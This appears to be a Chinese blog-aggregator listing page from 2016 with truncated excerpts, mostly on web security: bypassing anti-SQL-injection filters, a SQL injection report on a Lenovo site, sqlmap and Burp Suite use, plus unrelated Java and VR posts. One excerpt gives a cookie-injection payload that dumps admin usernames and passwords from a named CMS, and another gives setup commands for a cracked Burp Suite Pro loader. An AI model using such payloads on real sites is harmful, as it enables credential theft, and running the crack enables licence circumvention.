摘要:随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓。很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序。这时我们用常规的手段去探测网站的SQL注入漏洞时会被防注入程序阻挡,遇到这种情况我们该怎么办?难道就没有办法了吗?答案是否定的。 随着网 ...
分类:
Web程序 时间:
2016-04-26 07:05:39
阅读次数:
318
建议:过滤/转义非法参数,屏蔽SQL查询错误。 工具:Firefox,hackbar,sqlmap,burpsuite 1、联想tms站 例1, 联想tms站fromCity参数存在普通SQL注入 提交,fromCity=6F9619FF-8A86-D011-B42D-00004FC964FF’ U ...
分类:
数据库 时间:
2016-04-20 17:39:14
阅读次数:
850
启航企业建站系统 cookie注入漏洞通杀所有版本直接上exploit:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admi ...
分类:
其他好文 时间:
2016-04-18 01:06:20
阅读次数:
2280
20145326网络安全攻防学习平台 - 基础关 一些基本方法介绍 开发者工具:一般浏览器都自带开发者工具(快捷键为F12),点击后,可以查看当前网页的源代码,智能一点的浏览器,将鼠标移到指定的代码上,就会在网页的相应位置显示出代码呈现出的界面。 BurpSuite:Burp Suite 是用于攻击 ...
分类:
其他好文 时间:
2016-04-18 00:52:55
阅读次数:
415
http://zone.wooyun.org/content/25982 需要用到firefox的插件plug-n-hack下载https://raw.githubusercontent.com/mozmark/ringleader/master/fx_pnh.xpi在firefox中选择从文件中安 ...
分类:
Web程序 时间:
2016-04-14 15:53:22
阅读次数:
600
sqlmap是一款开源的注入工具,支持几乎所有的数据库,支持get/post/cookie注入,支持错误回显注入/盲注,还有其他多种注入方法。 支持代理,指纹识别技术判断数据库 。而sqm(sqlmapGUI)是一个图形界面,在上面可以快速地组装参数,构造sqlmap命令语句,来调用sqlmap来执 ...
分类:
数据库 时间:
2016-04-03 15:46:59
阅读次数:
322
0x00 摘要: 本系列文章通过对BurpLoader的几个版本的逆向分析,分析Burpsuite的破解原理,分析Burpsuite认证体系存在的安全漏洞。 0x01 JD-GUI的用途与缺陷: JD-GUI是一款从JAVA字节码中还原JAVA源代码的免费工具,一般情况下使用这款工具做JAVA逆向就 ...
分类:
编程语言 时间:
2016-04-03 14:38:02
阅读次数:
307
mkdir/opt/burpsuite1638把解压到的文件放到这个目录下:BurpLoader_v1.6.38.jar,burpsuite_pro_v1.6.38.jarchmod+x/opt/burpsuite1638/*vi/usr/bin/burpsuite1638#!/bin/bashjava-jar/opt/burpsuite1638/BurpLoader_v1.6.38.jarchmod+x/usr/bin/burpsuite1638run:burpsuite1638
分类:
系统相关 时间:
2016-03-26 20:36:19
阅读次数:
390
(1)对于取值范围固定的属性,应尽可能将其定义为枚举类型; (2)Iterable,Collection,List,Set,Map都是接口,它们之间的关系为: List和Set继承Collection,Collection继承Iterable;Map属于单独的一个派系,它是最顶层的接口,对它的实现有
分类:
数据库 时间:
2016-03-15 13:30:12
阅读次数:
182
近期,美国“The VOID”、澳洲“Zero Latency”两大虚拟现实主题乐园让许多爱好者兴奋至极,门票据说都已经预约到明年2月!在如此巨大的商机面前,谁将抢到国内VR虚拟现实主题公园第一块蛋糕?! 据悉,国内老牌VR科技公司黑晶打造的Pangolin穿山甲VR虚拟现实主题公园即将落户北京!
分类:
其他好文 时间:
2016-03-04 00:39:07
阅读次数:
223
